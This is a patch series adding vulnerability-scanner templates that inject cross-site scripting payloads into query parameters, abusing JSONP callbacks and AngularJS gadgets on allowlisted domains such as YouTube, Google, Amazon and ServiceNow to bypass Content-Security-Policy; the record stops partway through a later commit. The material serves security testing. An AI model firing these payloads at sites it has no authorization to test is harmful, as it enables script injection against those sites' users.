From a9326d9f0f18893d5b084d3ead54c5c6efd7602e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Fri, 24 Jan 2025 16:58:18 +0530
Subject: [PATCH 01/10] Create youtube-csp-xss.yaml

---
 .../xss/csp/youtube-csp-xss.yaml              | 48 +++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml

diff --git a/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml
new file mode 100644
index 00000000000..215f995b85c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml
@@ -0,0 +1,48 @@
+id: youtube-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Youtube
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://infosecwriteups.com/riding-the-waves-of-api-versioning-unmasking-a-stored-xss-vulnerability-bypassing-csp-using-c039c10df2b1
+    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L206C17-L206C89
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,youtube
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.youtube.com/oembed?callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "www.youtube.com"
+          - "script-src"
+        condition: and

From 9b93b40c1a447bd7f0ba15a18905c38a0211e3bc Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 27 Jan 2025 15:48:23 +0530
Subject: [PATCH 02/10] Added 5 csp bypass

---
 .../xss/csp/360cn-csp-xss.yaml                | 47 +++++++++++++++++++
 .../xss/csp/gstatic-csp-xss.yaml              | 47 +++++++++++++++++++
 .../xss/csp/meteoprog-csp-xss.yaml            | 47 +++++++++++++++++++
 .../xss/csp/sogou-csp-xss.yaml                | 47 +++++++++++++++++++
 .../xss/csp/virtualearth-csp-xss.yaml         | 47 +++++++++++++++++++
 5 files changed, 235 insertions(+)
 create mode 100644 dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml

diff --git a/dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml b/dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml
new file mode 100644
index 00000000000..a55fd8da551
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: 360cn-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via 360.cn
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L208C19-L208C106
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,360cn
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://zhike.help.360.cn/api/v1/robotWindow?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "360.cn"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml
new file mode 100644
index 00000000000..28f1e94d860
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: gstatic-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Gstatic
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L196C17-L196C169
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,gstatic
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - "<script src='https://www.gstatic.com/recaptcha/about/js/main.min.js'></script><img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>"
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "www.gstatic.com"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml b/dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml
new file mode 100644
index 00000000000..c9ac2664e1c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: meteoprog-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Meteoprog
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L193C18-L193C120
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,meteoprog
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "meteoprog.ua"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml
new file mode 100644
index 00000000000..930b2ad6d13
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: sogou-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Sogou
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L210C1-L210C21
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,sogou
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://zhuanjia.sogou.com/base/ajax/login/login-init?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "sogou.com"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml b/dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml
new file mode 100644
index 00000000000..c285f081a3c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: virtualearth-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Virtualearth
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L210C1-L210C21
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,virtualearth
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://dev.virtualearth.net/REST/v1/Imagery/Metadata/Road?jsonp=alert(document.domain);//"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "virtualearth.net"
+          - "script-src"
+        condition: and
\ No newline at end of file

From 4d13d991360541d96c68bb96eb351cfaa79ada7e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 27 Jan 2025 16:35:59 +0530
Subject: [PATCH 03/10] 6 New CSP Bypass

---
 .../xss/csp/amazon-csp-xss.yaml               | 47 +++++++++++++++++
 .../xss/csp/google-csp-xss.yaml               | 51 +++++++++++++++++++
 .../xss/csp/googleapis-csp-xss.yaml           | 51 +++++++++++++++++++
 .../xss/csp/ovoenergy-csp-xss.yaml            | 47 +++++++++++++++++
 .../xss/csp/pixplug-csp-xss.yaml              | 46 +++++++++++++++++
 .../xss/csp/servicenow-csp-xss.yaml           | 47 +++++++++++++++++
 6 files changed, 289 insertions(+)
 create mode 100644 dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/google-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml

diff --git a/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml
new file mode 100644
index 00000000000..8cbb277d68c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: amazon-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Amazon
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L132C9-L132C15
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,amazon
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - <body ng-app ng-csp><script src="https://romania.amazon.com/app/vendor.min.js"></script><input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'></body>
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "amazon.com"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-csp-xss.yaml
new file mode 100644
index 00000000000..02c19fa6916
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/google-csp-xss.yaml
@@ -0,0 +1,51 @@
+id: google-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L186
+    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L187
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - "<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script><img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>"
+        - '<script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "google.com"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml
new file mode 100644
index 00000000000..da72ae1874d
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml
@@ -0,0 +1,51 @@
+id: googleapis-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via GoogleAPIS
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L188
+    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L189C5-L189C19
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,googleapis
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.googleapis.com/blogger/v3/blogs/1/posts/1?callback=alert()"></script>'
+        - '<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "googleapis.com"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml
new file mode 100644
index 00000000000..05d1b99a9c9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: ovoenergy-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via OvoEnergy
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L99C1-L99C29
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ovoenergy
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://js-smb.devices.ovoenergy.com/js-smb.min.js"></script><div ng-app><img src=x ng-on-error="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "ovoenergy.com"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml
new file mode 100644
index 00000000000..41d9793617f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml
@@ -0,0 +1,46 @@
+id: pixplug-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via PixPlug
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L174C20-L174C106
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,pixplug
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://visitor.pixplug.in/jsonp/getdata.php?callback=alert(1)"></script>'
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "pixplug.in"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml b/dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml
new file mode 100644
index 00000000000..8263d6499f7
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: servicenow-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via ServiceNow
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L101C25-L101C234
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,servicenow
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - <body ng-app ng-csp><script src="https://kbcprod.service-now.com/scripts/angular_includes_1.5.11.jsx"></script><input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'"></body>
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "service-now.com"
+          - "script-src"
+        condition: and
\ No newline at end of file

From e975d761bf20c922bfc9ea383c489c64e974f3b6 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 27 Jan 2025 18:27:15 +0530
Subject: [PATCH 04/10] fix-payload

---
 dast/vulnerabilities/xss/csp/google-csp-xss.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/dast/vulnerabilities/xss/csp/google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-csp-xss.yaml
index 02c19fa6916..b6fc118d668 100644
--- a/dast/vulnerabilities/xss/csp/google-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/google-csp-xss.yaml
@@ -19,15 +19,15 @@ http:
 
     payloads:
       injection:
+        - '<script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert"></script>'
         - "<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script><img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>"
-        - '<script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>'
 
     fuzzing:
       - part: query
         type: replace
         mode: single
         fuzz:
-          - "{{injection}}"
+          - "{{url_encode(injection)}}"
 
     stop-at-first-match: true
 

From b826dc46b4c740e51ad348d42d57a9a0e3524470 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 27 Jan 2025 18:37:17 +0530
Subject: [PATCH 05/10] few more csp bypass incoming

---
 .../xss/csp/fwmrm-csp-xss.yaml                | 47 +++++++++++++++++++
 dast/vulnerabilities/xss/csp/mi-csp-xss.yaml  | 47 +++++++++++++++++++
 2 files changed, 94 insertions(+)
 create mode 100644 dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/mi-csp-xss.yaml

diff --git a/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml b/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml
new file mode 100644
index 00000000000..d6d09a10b0a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: fwmrm-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via FreeWheel
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L2C19-L2C113
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,fwmrm
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://7b936.v.fwmrm.net/ad/g/1?nw=1&csid=1&resp=json&cbfn=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "fwmrm.net"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/mi-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mi-csp-xss.yaml
new file mode 100644
index 00000000000..94a7b8fc922
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/mi-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: mi-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Mi
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L3
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,mi
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://a.huodong.mi.com/postfree/postfree?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "mi.com"
+          - "script-src"
+        condition: and
\ No newline at end of file

From c02d565baf6707c98991ed6f6d8d675be4c62a3a Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 27 Jan 2025 19:58:23 +0530
Subject: [PATCH 06/10] additional templates

---
 .../xss/csp/aliexpress-csp-xss.yaml           | 47 +++++++++++++++++++
 .../xss/csp/amazon-csp-xss.yaml               |  8 +++-
 .../xss/csp/lpsnmedia-csp-xss.yaml            | 47 +++++++++++++++++++
 3 files changed, 100 insertions(+), 2 deletions(-)
 create mode 100644 dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml

diff --git a/dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml
new file mode 100644
index 00000000000..81c57a63570
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: aliexpress-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via AliExpress
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L4C5-L4C19
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,aliexpress
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://acs.aliexpress.com/h5/mtop.aliexpress.address.shipto.division.get/1.0/?type=jsonp&dataType=jsonp&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "aliexpress.com"
+          - "script-src"
+        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml
index 8cbb277d68c..2c6a6cfb7f2 100644
--- a/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml
@@ -5,7 +5,8 @@ info:
   author: DhiyaneshDK
   severity: high
   reference:
-    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L132C9-L132C15
+    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L136
+    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L5C19-L5C100
   metadata:
     verified: true
   tags: xss,csp-bypass,amazon
@@ -19,13 +20,16 @@ http:
     payloads:
       injection:
         - <body ng-app ng-csp><script src="https://romania.amazon.com/app/vendor.min.js"></script><input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'></body>
+        - <script src="https://aax-eu.amazon.com/e/xsp/getAdj?callback=alert(1)-"></script>
 
     fuzzing:
       - part: query
         type: replace
         mode: single
         fuzz:
-          - "{{injection}}"
+          - "{{url_encode(injection)}}"
+
+    stop-at-first-match: true
 
     matchers-condition: and
     matchers:
diff --git a/dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml
new file mode 100644
index 00000000000..b649f234783
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: lpsnmedia-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Lpsnmedia
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L6C7-L6C16
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,lpsnmedia
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://accdn.lpsnmedia.net/api/account/1/configuration/engagement-window/window-confs/1?cb=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: word
+        part: content_security_policy
+        words:
+          - "lpsnmedia.net"
+          - "script-src"
+        condition: and
\ No newline at end of file

From bf060b27cbe8256b404e840853f4ad0dd339d7e2 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 28 Jan 2025 05:48:08 +0530
Subject: [PATCH 07/10] Additional CSP Bypass

---
 .../xss/csp/digitalocean-csp-xss.yaml         | 47 +++++++++++++++++++
 .../xss/csp/google-accounts-csp-xss.yaml      | 47 +++++++++++++++++++
 .../xss/csp/tiktok-analytics-csp-xss.yaml     | 47 +++++++++++++++++++
 .../xss/csp/youku-csp-xss.yaml                | 47 +++++++++++++++++++
 4 files changed, 188 insertions(+)
 create mode 100644 dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/google-accounts-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/youku-csp-xss.yaml

diff --git a/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml b/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml
new file mode 100644
index 00000000000..58696b4a0e8
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml
@@ -0,0 +1,47 @@
+id: digitalocean-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via DigitalOcean Anchor
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L12C25-L12C151
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,digitalocean
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://anchor.digitalocean.com/index.php/form/getForm?munchkinId=113-DTN-266&form=1402&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+
+      - type: word
+        part: content_type
